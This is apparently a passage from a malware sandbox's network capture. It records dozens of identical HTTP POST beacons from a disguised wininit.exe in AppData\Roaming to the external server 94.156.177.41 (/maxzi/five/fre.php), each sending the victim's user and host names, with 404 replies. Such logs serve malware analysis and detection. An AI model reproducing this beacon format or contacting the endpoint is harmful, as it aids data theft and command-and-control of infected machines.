                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.45851694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:56.950526953 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:56.955480099 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:57.812340021 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:57 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.45851894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:57.979212999 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:57.984069109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:58.732697964 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:58 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.45852494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:58.884505033 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:58.889595985 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:59.631649971 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:59 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.45853094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:59.782968998 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:59.787877083 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:00.539496899 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:00 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.45853694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:00.686570883 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:00.691488981 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:01.430891037 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:01 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.2.45854394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:01.576360941 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:01.582640886 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:02.329118013 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:02 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.2.45855394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:02.613675117 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:02.624665022 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:03.353976011 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:03 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.2.45855994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:03.511341095 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:03.519337893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:04.399334908 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:04 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.2.45856594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:04.539978981 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:04.545049906 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:05.306345940 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:05 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.2.45857294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:05.449069023 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:05.453999043 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:06.207166910 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:06 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.2.45858294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:06.360265970 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:06.367844105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:07.123575926 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.2.45858894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:07.278301001 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:07.287005901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:08.022133112 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.2.45859494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:08.170245886 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:08.176054001 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:08.911760092 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:08 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              60192.168.2.45860094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:09.059215069 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:09.065860033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:09.796715021 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:09 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              61192.168.2.45860694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:09.954740047 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:09.959629059 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:10.692233086 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:10 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              62192.168.2.45861394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:10.838181019 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:10.847502947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:11.593069077 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:11 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.2.45862394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:11.815056086 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:11.824398994 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:12.566646099 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:12 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.2.45862994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:12.714579105 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
